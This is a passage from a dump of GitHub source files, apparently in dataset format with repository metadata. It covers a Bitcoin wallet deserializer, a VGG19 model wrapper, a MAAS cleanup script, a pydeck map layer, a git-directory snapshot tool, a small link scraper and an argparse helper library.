time\nfrom util import short_hex, long_hex\n\ndef parse_CAddress(vds):\n d = {}\n d['nVersion'] = vds.read_int32()\n d['nTime'] = vds.read_uint32()\n d['nServices'] = vds.read_uint64()\n d['pchReserved'] = vds.read_bytes(12)\n d['ip'] = socket.inet_ntoa(vds.read_bytes(4))\n d['port'] = vds.read_uint16()\n return d\n\ndef deserialize_CAddress(d):\n return d['ip']+\":\"+str(d['port'])+\" (lastseen: %s)\"%(time.ctime(d['nTime']),)\n\ndef parse_setting(setting, vds):\n if setting[0] == \"f\": # flag (boolean) settings\n return str(vds.read_boolean())\n elif setting[0:4] == \"addr\": # CAddress\n d = parse_CAddress(vds)\n return 
deserialize_CAddress(d)\n elif setting == \"nTransactionFee\":\n return vds.read_int64()\n elif setting == \"nLimitProcessors\":\n return vds.read_int32()\n return 'unknown setting'\n\ndef parse_TxIn(vds):\n d = {}\n d['prevout_hash'] = vds.read_bytes(32)\n d['prevout_n'] = vds.read_uint32()\n d['scriptSig'] = vds.read_bytes(vds.read_compact_size())\n d['sequence'] = vds.read_uint32()\n return d\ndef deserialize_TxIn(d):\n if d['prevout_hash'] == \"\\x00\"*32:\n result = \"TxIn: COIN GENERATED\"\n result += \" coinbase:\"+d['scriptSig'].encode('hex_codec')\n else:\n result = \"TxIn: prev(\"+long_hex(d['prevout_hash'][::-1])+\":\"+str(d['prevout_n'])+\")\"\n pk = extract_public_key(d['scriptSig'])\n result += \" pubkey: \"+pk\n result += \" sig: \"+decode_script(d['scriptSig'])\n if d['sequence'] < 0xffffffff: result += \" sequence: \"+hex(d['sequence'])\n return result\n\ndef parse_TxOut(vds):\n d = {}\n d['value'] = vds.read_int64()\n d['scriptPubKey'] = vds.read_bytes(vds.read_compact_size())\n return d\ndef deserialize_TxOut(d):\n result = \"TxOut: value: %.2f\"%(d['value']/1.0e8,)\n pk = extract_public_key(d['scriptPubKey'])\n result += \" pubkey: \"+pk\n result += \" Script: \"+decode_script(d['scriptPubKey'])\n return result\n\ndef parse_Transaction(vds):\n d = {}\n d['version'] = vds.read_int32()\n n_vin = vds.read_compact_size()\n d['txIn'] = []\n for i in xrange(n_vin):\n d['txIn'].append(parse_TxIn(vds))\n n_vout = vds.read_compact_size()\n d['txOut'] = []\n for i in xrange(n_vout):\n d['txOut'].append(parse_TxOut(vds))\n d['lockTime'] = vds.read_uint32()\n return d\ndef deserialize_Transaction(d):\n result = \"%d tx in, %d out\\n\"%(len(d['txIn']), len(d['txOut']))\n for txIn in d['txIn']:\n result += deserialize_TxIn(txIn) + \"\\n\"\n for txOut in d['txOut']:\n result += deserialize_TxOut(txOut) + \"\\n\"\n return result\n\ndef parse_MerkleTx(vds):\n d = parse_Transaction(vds)\n d['hashBlock'] = vds.read_bytes(32)\n n_merkleBranch = vds.read_compact_size()\n d['merkleBranch'] = vds.read_bytes(32*n_merkleBranch)\n d['nIndex'] = vds.read_int32()\n return d\n\ndef deserialize_MerkleTx(d):\n result = deserialize_Transaction(d)\n result = \"Merkle hashBlock: \"+short_hex(d['hashBlock'][::-1])+\"\\n\" + result\n return result\n\ndef parse_WalletTx(vds):\n d = parse_MerkleTx(vds)\n n_vtxPrev = vds.read_compact_size()\n d['vtxPrev'] = []\n for i in xrange(n_vtxPrev):\n d['vtxPrev'].append(parse_MerkleTx(vds))\n\n d['mapValue'] = {}\n n_mapValue = vds.read_compact_size()\n for i in xrange(n_mapValue):\n key = vds.read_string()\n value = vds.read_string()\n d['mapValue'][key] = value\n n_orderForm = vds.read_compact_size()\n d['orderForm'] = []\n for i in xrange(n_orderForm):\n first = vds.read_string()\n second = vds.read_string()\n d['orderForm'].append( (first, second) )\n # Versioning was messed up before bitcoin 0.3.14.04;\n # nVersion is actually fTimeReceivedIsTxTime before then.\n d['nVersion'] = vds.read_uint32()\n d['timeReceived'] = vds.read_uint32()\n d['fromMe'] = vds.read_boolean()\n d['spent'] = vds.read_boolean()\n if d['nVersion'] > 31404:\n d['fTimeReceivedIsTxTime'] = vds.read_boolean()\n d['fUnused'] = vds.read_boolean()\n d['fromAccount'] = vds.read_string()\n\n return d\n\ndef deserialize_WalletTx(d):\n result = deserialize_MerkleTx(d)\n\n result += \"mapValue:\"+str(d['mapValue'])\n # One of these days I'll ask Satoshi what the orderForm stuff is/was for...\n # result += \"\\n\"+\" orderForm:\"+str(d['orderForm'])\n result += 
\"\\n\"+\"timeReceived:\"+time.ctime(d['timeReceived'])+\" fromMe:\"+str(d['fromMe'])+\" spent:\"+str(d['spent'])\n if d['nVersion'] > 31404:\n result += \"\\n fromAccount: \"+d['fromAccount']\n return result\n\ndef parse_Block(vds):\n d = {}\n d['version'] = vds.read_int32()\n d['hashPrev'] = vds.read_bytes(32)\n d['hashMerkleRoot'] = vds.read_bytes(32)\n d['nTime'] = vds.read_uint32()\n d['nBits'] = vds.read_uint32()\n d['nNonce'] = vds.read_uint32()\n d['transactions'] = []\n nTransactions = vds.read_compact_size()\n for i in xrange(nTransactions):\n d['transactions'].append(parse_Transaction(vds))\n\n return d\n \ndef deserialize_Block(d):\n result = \"Time: \"+time.ctime(d['nTime'])+\" Nonce: \"+str(d['nNonce'])\n result += \"\\nnBits: 0x\"+hex(d['nBits'])\n result += \"\\nhashMerkleRoot: 0x\"+d['hashMerkleRoot'][::-1].encode('hex_codec')\n result += \"\\nPrevious block: \"+d['hashPrev'][::-1].encode('hex_codec')\n result += \"\\n%d transactions:\\n\"%len(d['transactions'])\n for t in d['transactions']:\n result += deserialize_Transaction(t)+\"\\n\"\n return result\n\nopcodes = Enumeration(\"Opcodes\", [\n (\"OP_0\", 0), (\"OP_PUSHDATA1\",76), \"OP_PUSHDATA2\", \"OP_PUSHDATA4\", \"OP_1NEGATE\", \"OP_RESERVED\",\n \"OP_1\", \"OP_2\", \"OP_3\", \"OP_4\", \"OP_5\", \"OP_6\", \"OP_7\",\n \"OP_8\", \"OP_9\", \"OP_10\", \"OP_11\", \"OP_12\", \"OP_13\", \"OP_14\", \"OP_15\", \"OP_16\",\n \"OP_NOP\", \"OP_VER\", \"OP_IF\", \"OP_NOTIF\", \"OP_VERIF\", \"OP_VERNOTIF\", \"OP_ELSE\", \"OP_ENDIF\", \"OP_VERIFY\",\n \"OP_RETURN\", \"OP_TOALTSTACK\", \"OP_FROMALTSTACK\", \"OP_2DROP\", \"OP_2DUP\", \"OP_3DUP\", \"OP_2OVER\", \"OP_2ROT\", \"OP_2SWAP\",\n \"OP_IFDUP\", \"OP_DEPTH\", \"OP_DROP\", \"OP_DUP\", \"OP_NIP\", \"OP_OVER\", \"OP_PICK\", \"OP_ROLL\", \"OP_ROT\",\n \"OP_SWAP\", \"OP_TUCK\", \"OP_CAT\", \"OP_SUBSTR\", \"OP_LEFT\", \"OP_RIGHT\", \"OP_SIZE\", \"OP_INVERT\", \"OP_AND\",\n \"OP_OR\", \"OP_XOR\", \"OP_EQUAL\", \"OP_EQUALVERIFY\", \"OP_RESERVED1\", \"OP_RESERVED2\", \"OP_1ADD\", \"OP_1SUB\", \"OP_2MUL\",\n \"OP_2DIV\", \"OP_NEGATE\", \"OP_ABS\", \"OP_NOT\", \"OP_0NOTEQUAL\", \"OP_ADD\", \"OP_SUB\", \"OP_MUL\", \"OP_DIV\",\n \"OP_MOD\", \"OP_LSHIFT\", \"OP_RSHIFT\", \"OP_BOOLAND\", \"OP_BOOLOR\",\n \"OP_NUMEQUAL\", \"OP_NUMEQUALVERIFY\", \"OP_NUMNOTEQUAL\", \"OP_LESSTHAN\",\n \"OP_GREATERTHAN\", \"OP_LESSTHANOREQUAL\", \"OP_GREATERTHANOREQUAL\", \"OP_MIN\", \"OP_MAX\",\n \"OP_WITHIN\", \"OP_RIPEMD160\", \"OP_SHA1\", \"OP_SHA256\", \"OP_HASH160\",\n \"OP_HASH256\", \"OP_CODESEPARATOR\", \"OP_CHECKSIG\", \"OP_CHECKSIGVERIFY\", \"OP_CHECKMULTISIG\",\n \"OP_CHECKMULTISIGVERIFY\",\n (\"OP_SINGLEBYTE_END\", 0xF0),\n (\"OP_DOUBLEBYTE_BEGIN\", 0xF000),\n \"OP_PUBKEY\", \"OP_PUBKEYHASH\",\n (\"OP_INVALIDOPCODE\", 0xFFFF),\n])\n\ndef script_GetOp(bytes):\n i = 0\n while i < len(bytes):\n vch = None\n opcode = ord(bytes[i])\n i += 1\n if opcode >= opcodes.OP_SINGLEBYTE_END:\n opcode <<= 8\n opcode |= bytes[i]\n i += 1\n\n if opcode <= opcodes.OP_PUSHDATA4:\n nSize = opcode\n if opcode == opcodes.OP_PUSHDATA1:\n nSize = ord(bytes[i])\n i += 1\n elif opcode == opcodes.OP_PUSHDATA2:\n nSize = unpack_from(' 0: result += \" \"\n if opcode <= opcodes.OP_PUSHDATA4:\n result += \"%d:\"%(opcode,)\n result += short_hex(vch)\n else:\n result += script_GetOpName(opcode)\n return result\n\ndef match_decoded(decoded, to_match):\n if len(decoded) != len(to_match):\n return False;\n for i in range(len(decoded)):\n if to_match[i] == opcodes.OP_PUSHDATA4 and decoded[i][0] <= opcodes.OP_PUSHDATA4:\n continue # 
Opcodes below OP_PUSHDATA4 all just push data onto stack, and are equivalent.\n if to_match[i] != decoded[i][0]:\n return False\n return True\n\ndef extract_public_key(bytes):\n decoded = [ x for x in script_GetOp(bytes) ]\n\n # non-generated TxIn transactions push a signature\n # (seventy-something bytes) and then their public key\n # (65 bytes) onto the stack:\n match = [ opcodes.OP_PUSHDATA4, opcodes.OP_PUSHDATA4 ]\n if match_decoded(decoded, match):\n return public_key_to_bc_address(decoded[1][1])\n\n # The Genesis Block, self-payments, and pay-by-IP-address payments look like:\n # 65 BYTES:... CHECKSIG\n match = [ opcodes.OP_PUSHDATA4, opcodes.OP_CHECKSIG ]\n if match_decoded(decoded, match):\n return public_key_to_bc_address(decoded[0][1])\n\n # Pay-by-Bitcoin-address TxOuts look like:\n # DUP HASH160 20 BYTES:... EQUALVERIFY CHECKSIG\n match = [ opcodes.OP_DUP, opcodes.OP_HASH160, opcodes.OP_PUSHDATA4, opcodes.OP_EQUALVERIFY, opcodes.OP_CHECKSIG ]\n if match_decoded(decoded, match):\n return hash_160_to_bc_address(decoded[2][1])\n\n return \"(None)\"\n","repo_name":"tuxsoul/bitcoin-tools","sub_path":"deserialize.py","file_name":"deserialize.py","file_ext":"py","file_size_in_byte":9151,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"48"} +{"seq_id":"5147168295","text":"from torchvision.models import VGG\nfrom torchvision import transforms\nimport torch\nfrom torch import nn\nfrom typing import Union, List, Any, cast\nfrom torchvision.models.vgg import VGG19_Weights\n\nclass VGG_with_trans(VGG):\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n x = transforms.Resize([224,224])(x)\n x = transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])(x)\n x = self.features(x)\n x = self.avgpool(x)\n x = torch.flatten(x, 1)\n x = self.classifier(x)\n return x\n\n\ndef make_layers(cfg: List[Union[str, int]], batch_norm: bool = False) -> nn.Sequential:\n layers: List[nn.Module] = []\n in_channels = 3\n for v in cfg:\n if v == \"M\":\n layers += [nn.MaxPool2d(kernel_size=2, stride=2)]\n else:\n v = cast(int, v)\n conv2d = nn.Conv2d(in_channels, v, kernel_size=3, padding=1)\n if batch_norm:\n layers += [conv2d, nn.BatchNorm2d(v), nn.ReLU(inplace=True)]\n else:\n layers += [conv2d, nn.ReLU(inplace=True)]\n in_channels = v\n return nn.Sequential(*layers)\n\ndef vgg19_IN(**kwargs: Any) -> VGG_with_trans:\n weights = VGG19_Weights.IMAGENET1K_V1\n weights = VGG19_Weights.verify(weights)\n cfgs_cfg = [64, 64, \"M\", 128, 128, \"M\", 256, 256, 256, 256, \"M\", 512, 512, 512, 512, \"M\", 512, 512, 512, 512, \"M\"]\n model = VGG_with_trans(features=make_layers(cfgs_cfg, batch_norm=False),**kwargs)\n model.load_state_dict(weights.get_state_dict(progress=True))\n return model\n\ndef vgg19_cifar(**kwargs: Any) -> VGG_with_trans:\n cfgs_cfg = [64, 64, \"M\", 128, 128, \"M\", 256, 256, 256, 256, \"M\", 512, 512, 512, 512, \"M\", 512, 512, 512, 512, \"M\"]\n # model = VGG_with_trans(features=make_layers(cfgs_cfg, batch_norm=False), num_classes=10,**kwargs)\n model = VGG_with_trans(features=make_layers(cfgs_cfg, batch_norm=False), num_classes=10,**kwargs)\n return model\n","repo_name":"HanxiuZhang/Adversarial-Frequency-Watermark","sub_path":"models/vgg_19.py","file_name":"vgg_19.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"21454507810","text":"#!/usr/bin/env python\n\"\"\"Delete all machines from given MAAS environment.\"\"\"\n\nfrom 
__future__ import print_function\n\nimport argparse\nfrom datetime import (\n datetime,\n timedelta,\n )\nimport sys\n\nfrom jujupy import JujuData\nimport substrate\n\n\ndef main(argv):\n parser = argparse.ArgumentParser(\n description=\"Delete the machines in MAAS.\")\n parser.add_argument(\"name\", help=\"Name of the MAAS in juju config.\")\n parser.add_argument('--hours', help='Minimum age in hours.', type=float)\n parser.add_argument('--dry-run', action='store_true',\n help=\"Show what would be deleted, but don't delete.\")\n args = parser.parse_args(argv[1:])\n boot_config = JujuData.from_config(args.name)\n with substrate.maas_account_from_boot_config(boot_config) as manager:\n machines = manager.get_allocated_nodes()\n if args.hours is not None:\n threshold = datetime.now() - timedelta(hours=args.hours)\n machines = dict(\n (k, v) for k, v in machines.items()\n if manager.get_acquire_date(v['system_id']) < threshold)\n print(\"Found {} machines: {}\".format(len(machines), machines.keys()))\n if not args.dry_run:\n manager.terminate_instances(machine[\"resource_uri\"]\n for machine in machines.values())\n print(\"Released.\")\n return 0\n\n\nif __name__ == \"__main__\":\n sys.exit(main(sys.argv))\n","repo_name":"juju/1.25-upgrade","sub_path":"juju2/acceptancetests/clean_maas.py","file_name":"clean_maas.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"13809839777","text":"import copy\nimport functools\n\nimport pydeck\n\nfrom typing import Iterable, Any\n\nfrom splyne.mapping.common.common import GeoPoint\nfrom splyne.mapping.common.view_state import ViewState\nfrom splyne.mapping.layers.base import BaseLayer\nfrom splyne.utils.transformers import make_pipe\n\n\nclass ScatterplotLayer(BaseLayer):\n\n DEFAULT_RADIUS = 10\n DEFAULT_LINE_WIDTH = 1\n DEFAULT_COLOR = [50, 20, 200]\n\n DEFAULT_PARAMS = {\n 'pickable': True,\n 'stroked': True,\n 'filled': True,\n 'radius_min_pixels': DEFAULT_RADIUS,\n 'radius_max_pixels': DEFAULT_RADIUS,\n 'radius_scale': 10,\n 'line_width_min_pixels ': DEFAULT_LINE_WIDTH,\n 'line_width_max_pixels': DEFAULT_LINE_WIDTH,\n 'get_position': ['lon', 'lat'],\n 'get_radius': 100,\n 'get_color': DEFAULT_COLOR,\n }\n\n def __init__(\n self,\n data: Iterable[Any],\n view_state: ViewState,\n **kwargs,\n ):\n super().__init__()\n self.pydeck_kwargs = ScatterplotLayer.DEFAULT_PARAMS\n self.pydeck_kwargs.update(kwargs)\n\n data_tranformer = make_pipe(\n copy.deepcopy,\n functools.partial(self._update_view_state, view_state=view_state),\n self._update_kwargs,\n )\n self.data = data_tranformer(data)\n\n def _update_kwargs(self, item: Any) -> Any:\n if 'color' in item:\n self.pydeck_kwargs['get_color'] = 'color'\n if 'size' in item:\n self.pydeck_kwargs['get_size'] = 'size'\n return item\n\n def _update_view_state(self, item: Any, view_state: ViewState) -> Any:\n view_state.update(GeoPoint(item['lat'], item['lon']))\n return item\n\n def _update_view_state_from_iter(self, data: Iterable[Any], view_state: ViewState):\n for item in data:\n yield self._update_view_state(item, view_state)\n\n def make_pydeck_layer(self) -> pydeck.Layer:\n return pydeck.Layer(\"ScatterplotLayer\", data=list(self.data), **self.pydeck_kwargs)\n","repo_name":"pornopatsan/splyne","sub_path":"splyne/mapping/layers/scatterplot.py","file_name":"scatterplot.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} 
+{"seq_id":"14570870445","text":"#!/usr/bin/env python\n\"\"\" snapshots.py: How to use this file:\n this is a basic git directory tracker (super low functionality). What does\n it do? First, create a GitDirLog with\n\n import snapshots\n log = snapshots.GitDirLog(path_to_git_directory)\n\n Note that the git directory is the actual .git/ directory (not your repo!)\n Then go ahead and create a snapshot with:\n\n log.take_snapshot('optional message')\n\n Note that the message is pretty important for knowing what each snapshot is.\n Okay, now that you've taken a snapshot go make a change to your repository\n (with a git add, git commit, git branch, git checkout, etc) and take another\n snapshot:\n\n log.take_snapshot('I made a change and I liked iiiit')\n\n Note that this will return the snapshot object\n\n\"\"\"\nimport hashlib\nfrom datetime import datetime\nfrom os import path\nfrom os import walk\n\nfrom gitutil.git_fs import GitIndex\n\nFILE = 'f'\nDIR = 'd'\n\n\nclass Entry:\n \"\"\" An Entry represents either a file or a directory and stores information\n about the file such as the name, contents, hash, type, create date and\n modified date.\n \"\"\"\n\n def __init__(self, name, contents=None, sha1=0, tp=DIR,\n cdate=None, mdate=None, uid=None, gid=None, perms=None):\n self.name = name\n self.contents = contents\n self.sha1 = sha1\n self.type = tp\n self.cdate = cdate\n self.mdate = mdate\n self.uid = uid\n self.gid = gid\n self.perms = perms\n\n idx = name.index('.git')\n self.short_name = name[idx:]\n\n def __str__(self):\n return '[{}] {}'.format(self.type, self.short_name)\n\n def long_string(self):\n return '[{}] {} : {} : {}'.format(self.type, self.short_name, self.sha1,\n self.cdate, self.mdate)\n\n def __repr__(self):\n return str(self)\n\n def __le__(self, other):\n return self.name <= other.name\n\n def __lt__(self, other):\n return self.name < other.name\n\n def __gt__(self, other):\n return self.name > other.name\n\n def __ge__(self, other):\n return self.name >= other.name\n\n\nclass GitDirParser:\n \"\"\" Creates a time-indexed list of entries\"\"\"\n ext_to_ignore = ['swp']\n entries = []\n\n def __init__(self, mypath, verbose=True):\n self.path = mypath\n self.index = None\n if '.git' not in mypath:\n raise RuntimeError(\"Not a .git repository: \" + mypath)\n for (dirpath, dirnames, fnames) in walk(mypath):\n for d in dirnames:\n dname = dirpath + '/' + d\n cdt = str(datetime.fromtimestamp(path.getctime(dname)))\n mdt = str(datetime.fromtimestamp(path.getmtime(dname)))\n self.entries.append(Entry(dname, contents=None, sha1=0, tp=DIR,\n cdate=cdt, mdate=mdt))\n for f in fnames:\n fname = path.join(dirpath, f)\n try:\n with open(fname, 'rb') as afile:\n contents = afile.read()\n if fname.endswith('.git/index'):\n self.index = GitIndex(contents, verbose)\n contents = str(contents).encode('utf-8')\n\n sha1hasher = hashlib.sha1()\n sha1hasher.update(contents)\n sha1 = sha1hasher.hexdigest()\n cdt = str(datetime.fromtimestamp(path.getctime(fname)))\n mdt = str(datetime.fromtimestamp(path.getmtime(fname)))\n self.entries.append(Entry(fname, contents, sha1, tp=FILE,\n cdate=cdt, mdate=mdt))\n except Exception as e:\n print(\"Error reading fname: \" + fname + '. 
' + dirpath, dirnames, fnames)\n import traceback\n traceback.print_exc()\n\n\nclass DiffObject:\n def __init__(self, fst, snd):\n \"\"\"\n fst: GitDirSnapshot\n snd: GitDirSnapshot\n created: list of entries that were created (from fst to snd)\n removed: list of entries that were removed (from fst to snd)\n modified: list of entires that were modified (from fst to snd)\n static: list of entries that were unchanged (from fst to snd)\n \"\"\"\n self.fst = fst\n self.snd = snd\n created = []\n removed = []\n modified = []\n static = []\n\n if fst is None:\n for key in snd.entries.keys():\n created.append(snd.entries[key])\n\n else:\n fstkeys = fst.entries.keys()\n sndkeys = snd.entries.keys()\n allkeys = set(fstkeys).union(set(sndkeys))\n\n for key in allkeys:\n if key not in fstkeys:\n # key must be in self.entries and hence created\n created.append(snd.entries[key])\n\n elif key not in sndkeys:\n removed.append(fst.entries[key])\n\n elif key in sndkeys and key in fstkeys:\n new, old = snd.entries[key], fst.entries[key]\n if new.type == 'd' and old.type == 'd':\n static.append(new)\n\n elif new.type == 'f' and old.type == 'f':\n if new.sha1 == old.sha1:\n static.append(new)\n else:\n modified.append(new)\n else:\n modified.append(new)\n\n self.created = created\n self.removed = removed\n self.modified = modified\n self.static = static\n\n def print_diff(self, updated_only=True):\n print('+' + '-' * 78 + '+')\n\n if self.fst and self.snd:\n s = 'Difference Object: {} -> {}'.format(self.fst.message, self.snd.message)\n elif self.snd:\n s = 'Difference Object - New Snapshot: {}'.format(self.snd.message)\n s = '{0: ^78}'.format(s)\n\n print('|' + s + '|')\n print('+' + '-' * 78 + '+')\n\n print('| created [{}]:'.format(len(self.created)))\n for o in sorted(self.created):\n print('| ', o)\n print('| modified [{}]:'.format(len(self.modified)))\n for o in sorted(self.modified):\n print('| ', o)\n print('| removed [{}]:'.format(len(self.removed)))\n for o in sorted(self.removed):\n print('| ', o)\n\n if not updated_only:\n print('| static [{}]:'.format(len(self.static)))\n for o in sorted(self.static):\n print('| ', o)\n print('+' + '-' * 78 + '+')\n\n\nclass GitDirSnapshot:\n \"\"\"\n GitDirSnapshot holds a snapshot of the .git directory. 
This is the raw\n content and has little semantic meaning without being processed by a\n GitDir instance\n \"\"\"\n\n def __init__(self, dir_to_parse, message='', verbose=True):\n self.entries = {}\n if message:\n self.message = message\n else:\n self.message = \"{}\".format(datetime.now().strftime('%m/%d/%y %H:%M:%S'))\n gdp = GitDirParser(dir_to_parse, verbose)\n for entry in gdp.entries:\n self.entries[entry.name] = entry\n\n def parse_git_directory(self, dir_to_parse):\n pass\n\n def diff(self, other):\n \"\"\" assuming that self is newer than other, calculate the difference\n in the .git directory tree\n \"\"\"\n pass\n\n def __str__(self):\n return 'Snapshot[{}]'.format(self.message)\n\n def __repr__(self):\n return 'Snapshot[{}] with {} entries'.format(self.message, len(self.entries))\n\n\nclass GitDirLog:\n \"\"\" Takes a snapshot of the .git directory \"\"\"\n\n def __init__(self, gitdir, autodiff=True):\n \"\"\"\n gitdir: directory to track\n autodiff: track diffs (and print them) automatically\n \"\"\"\n self.snapshots = []\n self.gitdir = gitdir\n self.autodiff = autodiff\n self.diffs = None # Default, we don't store diffs\n\n if autodiff:\n self.diffs = []\n\n def take_snapshot(self, message='', verbose=True):\n snap = GitDirSnapshot(self.gitdir, message, verbose)\n self.snapshots.append(snap)\n if self.autodiff:\n if len(self.snapshots) > 1:\n s1, s2 = self.snapshots[-2:]\n else:\n s1, s2 = None, self.snapshots[-1]\n diff = DiffObject(s1, s2)\n self.diffs.append(diff)\n if verbose:\n diff.print_diff()\n\n return snap\n\n def compute_diffs(self):\n diffs = []\n if len(self.snapshots) > 0:\n s1, s2 = None, self.snapshots[-1]\n diffs = [DiffObject(s1, s2)] # Seed initial diff\n for i in range(1, len(self.snapshots)):\n s1, s2 = self.snapshots[i - 1], self.snapshots[i]\n diffs.append(DiffObject(s1, s2))\n return diffs\n\n def print_diffs(self, start=0, end=-1):\n print(\"-=\" * 40)\n print(\"| Printing Difference Objects |\")\n print(\"-=\" * 40)\n for diff in self.compute_diffs()[start:end]:\n diff.print_diff()\n","repo_name":"bkushigian/hog","sub_path":"src/snapshots.py","file_name":"snapshots.py","file_ext":"py","file_size_in_byte":9331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24832327219","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @File : facebook_extractor.py\n# @Author: Cedar\n# @Date : 2020/12/16\n# @Desc :\n\nfrom lxml import etree\nfrom requests.compat import urljoin\n\n\nwith open('seseporn.html', 'r', encoding='utf-8') as f:\n html = f.read()\n\nroot = etree.HTML(html)\nitems = root.xpath('//a/@href')\nresult = []\nfor item in items:\n url = urljoin('https://www.xvideos.com/', item)\n if 'https://www.xvideos.com/video' in url and 'videos-i-like' not in url:\n result.append(url)\n\nresult_set = set(result)\nresult = list(result_set)\nprint(result)\nprint(len(result))\n","repo_name":"wschxida/test","sub_path":"you-dl/xvideos.py","file_name":"xvideos.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10637466215","text":"'''Decorators/functions for turning functions into command line arguments'''\nfrom collections import OrderedDict\nfrom argparse import ArgumentParser\nfrom functools import wraps\n\n\n_commands = OrderedDict()\n_main_commands = OrderedDict()\n\n\ndef main_command(*dec_args, **dec_kwargs):\n '''Decorator for adding to main function (entry point)\n\n Should only be 
applied to one function'''\n return _store_command(dec_args, dec_kwargs, _main_commands)\n\n\ndef command(*dec_args, **dec_kwargs):\n '''Decorator for adding to sub commands'''\n return _store_command(dec_args, dec_kwargs, _commands)\n\n\ndef _store_command(dec_args, dec_kwargs, command_container):\n if len(dec_args) == 1 and callable(dec_args[0]):\n func = dec_args[0]\n command_container[func.__name__] = (func, [], {})\n\n # Preserve e.g. docstring.\n @wraps(func)\n def decorator_wrapper(*func_args, **func_kwargs):\n return func(*func_args, **func_kwargs)\n return decorator_wrapper\n else:\n\n def decorator(func):\n command_container[func.__name__] = (func, dec_args, dec_kwargs)\n\n # Preserve e.g. docstring.\n @wraps(func)\n def decorator_wrapper(*func_args, **func_kwargs):\n return func(*func_args, **func_kwargs)\n return decorator\n\n\nclass _NoDefaultClass(object):\n '''private class used to indicate that there is no default\n\n Better than using None'''\n pass\n\n\nclass CommandifyError(Exception):\n '''Exceptions thrown by commandify'''\n def __init__(self, message, error_type='code'):\n super(CommandifyError, self).__init__(message)\n if error_type not in ['code', 'user']:\n raise Exception('Error type {0} not understood'.format(error_type))\n self.error_type = error_type\n\n\nclass CommandifyArgumentParser(ArgumentParser):\n def __init__(self, provide_args={}, guess_type=True,\n suppress_warnings=[], *args, **kwargs):\n super(CommandifyArgumentParser, self).__init__(*args, **kwargs)\n self.provide_args = provide_args\n self.guess_type = guess_type\n self.suppress_warnings = suppress_warnings\n self.replaced_bool_args = []\n\n def _warn(self, kind, message):\n if kind not in self.suppress_warnings:\n print('COMMANDIFY WARNING: {0}'.format(message))\n print('...Disable warning by passing suppress_warnings=[\"{0}\"]'\n .format(kind))\n\n def setup_arguments(self):\n try:\n if len(_main_commands) == 0:\n raise CommandifyError('No main_command defined\\n'\n 'Please add the @main_command decorator '\n 'to one function')\n elif len(_main_commands) > 1:\n raise CommandifyError('More than one main_command defined\\n'\n 'Please add the @main_command decorator '\n 'to only one function')\n\n # Setup main command.\n main_command, main_args, main_kwargs =\\\n list(_main_commands.values())[0]\n main_doc = main_command.__doc__\n description = main_doc.split('\\n')[0] if main_doc else None\n self._add_commands_to_parser(main_command, self,\n main_args, main_kwargs)\n\n if len(_commands):\n # Setup subcommands.\n subparsers = self.add_subparsers(dest='command')\n for name, (command, dec_args, dec_kwargs) in _commands.items():\n if command.__doc__:\n help = command.__doc__.split('\\n')[0]\n else:\n help = None\n subparser = subparsers.add_parser(name, help=help)\n self._add_commands_to_parser(command, subparser,\n dec_args, dec_kwargs)\n\n except CommandifyError as e:\n if e.error_type == 'user':\n self.print_help()\n self.exit(status=1,\n message='{0}: error: {1}\\n'.format(self.prog, e))\n\n def _add_commands_to_parser(self, command, parser, dec_args, dec_kwargs):\n # Work out defaults for each command, set all defaults to\n # _NoDefaultClass then loop over default args (as defined in function\n # signature) settings them as necessary.\n defaults = [_NoDefaultClass] * command.__code__.co_argcount\n if command.__defaults__:\n for i in range(1, len(command.__defaults__) + 1):\n defaults[-i] = command.__defaults__[-i]\n\n # Loop over varnames (function argument names *and* local vars)\n # and 
defaults, adding an argparse argument.\n command_argument_names =\\\n command.__code__.co_varnames[:command.__code__.co_argcount]\n for varname, default in zip(command_argument_names, defaults):\n if varname == 'args' or varname in self.provide_args:\n # args is ignored so its default should not be set.\n if default != _NoDefaultClass:\n raise CommandifyError(\n 'Should not set a default value for args keyword')\n else:\n continue\n # Get the decorator arguments which will be used in\n # parser.add_argument(...).\n if varname in dec_kwargs:\n arg_kwargs = dec_kwargs.pop(varname)\n else:\n arg_kwargs = {}\n\n argname = varname.replace('_', '-')\n arg_args = ['--{0}'.format(argname)]\n # 'flag' is a special arg. keyword, it (e.g. 'flag': '-a')\n if 'flag' in arg_kwargs:\n flag = arg_kwargs.pop('flag')\n arg_args.append(flag)\n\n # Default can either be set in the function arguments or as a an\n # option to the command(...) decorator.\n if 'default' in arg_kwargs and default != _NoDefaultClass:\n raise CommandifyError('default set twice for func/method {0}'\n .format(command.__name__))\n if 'default' in arg_kwargs:\n default = arg_kwargs.pop('default')\n\n # Add the command line argument.\n if default != _NoDefaultClass:\n if self.guess_type and 'type' not in arg_kwargs:\n default_type = type(default)\n if default_type == bool:\n if default:\n self._warn('default_true',\n 'Setting {0} to not-{0}'\n .format(argname))\n # arg_kwargs['action'] = 'store_false'\n # Idea: replace arg_args[0] with something like:\n # arg_args[0] = '--not-' + arg_args[0][2:]\n # Then handle this on parse_args.\n negated_arg = '--not-' + arg_args[0][2:]\n self.replaced_bool_args.append(varname)\n arg_args[0] = negated_arg\n arg_kwargs['action'] = 'store_true'\n default = False\n else:\n arg_kwargs['action'] = 'store_true'\n elif not isinstance(default_type, type(None)):\n arg_kwargs['type'] = default_type\n parser.add_argument(*arg_args, default=default, **arg_kwargs)\n else:\n # Any arguments without a default are required.\n parser.add_argument(*arg_args, required=True, **arg_kwargs)\n # Check all decorator args have been accounted for.\n if dec_kwargs:\n raise CommandifyError('Unexpected command options: {0}'\n .format(', '.join(dec_kwargs.keys())))\n\n def parse_args(self, *args, **kwargs):\n self.args = super(CommandifyArgumentParser, self).parse_args(*args,\n **kwargs)\n # Replace not_some_arg=True with some_arg=False.\n for varname in 